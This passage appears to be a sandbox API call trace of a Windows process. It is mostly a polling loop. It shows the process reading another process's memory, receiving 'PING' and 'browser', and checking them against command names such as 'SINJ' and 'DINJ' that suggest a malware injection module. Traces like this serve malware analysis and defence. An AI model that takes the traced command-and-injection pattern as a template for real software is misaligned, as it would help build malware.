	[0246.231] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.231] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.231] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.231] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.231] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.231] Sleep (dwMilliseconds=0xbb8) 
	[0246.247] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.247] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.247] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.247] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.247] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.247] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.247] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.247] Sleep (dwMilliseconds=0xbb8) 
	[0246.262] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.262] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.262] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.262] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.262] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.263] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.263] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.263] Sleep (dwMilliseconds=0xbb8) 
	[0246.278] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.278] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.278] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.278] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.278] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.278] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.278] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.278] Sleep (dwMilliseconds=0xbb8) 
	[0246.294] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.294] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.294] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.294] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.294] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.294] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.294] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.294] Sleep (dwMilliseconds=0xbb8) 
	[0246.309] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.310] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.310] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.310] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.310] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.310] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.310] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.310] Sleep (dwMilliseconds=0xbb8) 
	[0246.325] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.325] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.325] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.325] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.325] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.325] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.325] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.325] Sleep (dwMilliseconds=0xbb8) 
	[0246.341] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.341] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.341] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.341] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.341] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.341] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.341] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.341] Sleep (dwMilliseconds=0xbb8) 
	[0246.356] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.357] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.357] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.357] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.357] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.357] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.357] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.357] Sleep (dwMilliseconds=0xbb8) 
	[0246.372] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.372] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.373] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.373] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.373] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.373] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.373] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.373] Sleep (dwMilliseconds=0xbb8) 
	[0246.388] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.388] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.388] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.388] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.388] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.388] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.388] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.388] Sleep (dwMilliseconds=0xbb8) 
	[0246.403] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.403] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.403] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.403] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.403] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.403] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.403] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.404] Sleep (dwMilliseconds=0xbb8) 
	[0246.419] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.419] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.419] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.419] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.419] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.419] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.419] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.419] Sleep (dwMilliseconds=0xbb8) 
	[0246.434] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.434] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.434] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.434] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.434] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.434] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.434] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.434] Sleep (dwMilliseconds=0xbb8) 
	[0246.449] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.450] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.450] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.450] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.450] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.450] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.450] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0246.450] Sleep (dwMilliseconds=0xbb8) 
	[0246.465] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0246.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0246.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0246.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0246.465] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0246.465] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225eb8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225eb8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0246.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0246.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9f0
	[0246.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225eb8, cbMultiByte=-1, lpWideCharStr=0x22ff9f0, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0246.465] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0246.466] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0246.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0246.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0940
	[0246.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x27c0940, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0246.466] SetEvent (hEvent=0x474) returned 1
	[0246.466] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0246.466] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0246.466] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0246.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0968
	[0246.466] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0246.466] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0246.466] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0246.466] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0246.466] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0246.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9c0
	[0246.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c0670, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdd4) returned 0x638
	[0246.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c05a8
	[0246.466] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.466] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.466] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.467] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.467] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.467] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c05a8) returned 1
	[0246.467] Sleep (dwMilliseconds=0xbb8) 
	[0246.481] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.481] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.481] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.481] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.481] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.481] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.481] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c05a8) returned 1
	[0246.481] Sleep (dwMilliseconds=0xbb8) 
	[0246.496] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.496] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.497] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.497] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.497] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.497] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.497] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c05a8) returned 1
	[0246.497] Sleep (dwMilliseconds=0xbb8) 
	[0246.544] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.544] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.544] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.544] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.544] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.544] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.544] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfea0) returned 1
	[0246.544] Sleep (dwMilliseconds=0xbb8) 
	[0246.559] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.559] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.559] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.559] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.559] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.559] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.559] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfea0) returned 1
	[0246.559] Sleep (dwMilliseconds=0xbb8) 
	[0246.574] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.574] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.574] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.574] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.574] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.574] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.575] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfea0) returned 1
	[0246.575] Sleep (dwMilliseconds=0xbb8) 
	[0246.590] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.590] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.590] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.590] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.590] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.590] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfea0) returned 1
	[0246.590] Sleep (dwMilliseconds=0xbb8) 
	[0246.606] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.606] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.606] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.606] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.606] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.606] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.606] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfea0) returned 1
	[0246.606] Sleep (dwMilliseconds=0xbb8) 
	[0246.625] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.625] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.625] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.626] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.626] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.626] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.626] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0246.626] Sleep (dwMilliseconds=0xbb8) 
	[0246.637] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.638] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.638] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.638] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.638] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.638] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.638] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0246.638] Sleep (dwMilliseconds=0xbb8) 
	[0246.653] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.653] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.653] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.653] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.654] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.654] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.654] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0246.654] Sleep (dwMilliseconds=0xbb8) 
	[0246.669] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.669] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.669] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.670] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.670] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.670] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.670] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0246.670] Sleep (dwMilliseconds=0xbb8) 
	[0246.731] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.731] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.731] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.731] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.731] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.731] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.731] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0246.731] Sleep (dwMilliseconds=0xbb8) 
	[0246.777] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.777] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.777] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.777] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.777] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.778] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.778] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0246.778] Sleep (dwMilliseconds=0xbb8) 
	[0246.823] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.823] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.823] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.823] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.824] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.824] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.824] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0246.824] Sleep (dwMilliseconds=0xbb8) 
	[0246.840] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.840] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.840] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.840] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.840] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.840] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.840] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0246.840] Sleep (dwMilliseconds=0xbb8) 
	[0246.856] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.856] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.857] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.857] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.857] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.857] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.857] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0246.857] Sleep (dwMilliseconds=0xbb8) 
	[0246.872] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.872] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.872] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.872] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.872] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.872] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0246.873] Sleep (dwMilliseconds=0xbb8) 
	[0246.887] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.887] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.887] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.887] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.887] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.887] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.887] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfe28) returned 1
	[0246.887] Sleep (dwMilliseconds=0xbb8) 
	[0246.904] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.904] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.904] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.904] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.904] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.904] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.904] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bfe28) returned 1
	[0246.904] Sleep (dwMilliseconds=0xbb8) 
	[0246.996] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0246.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225fc8
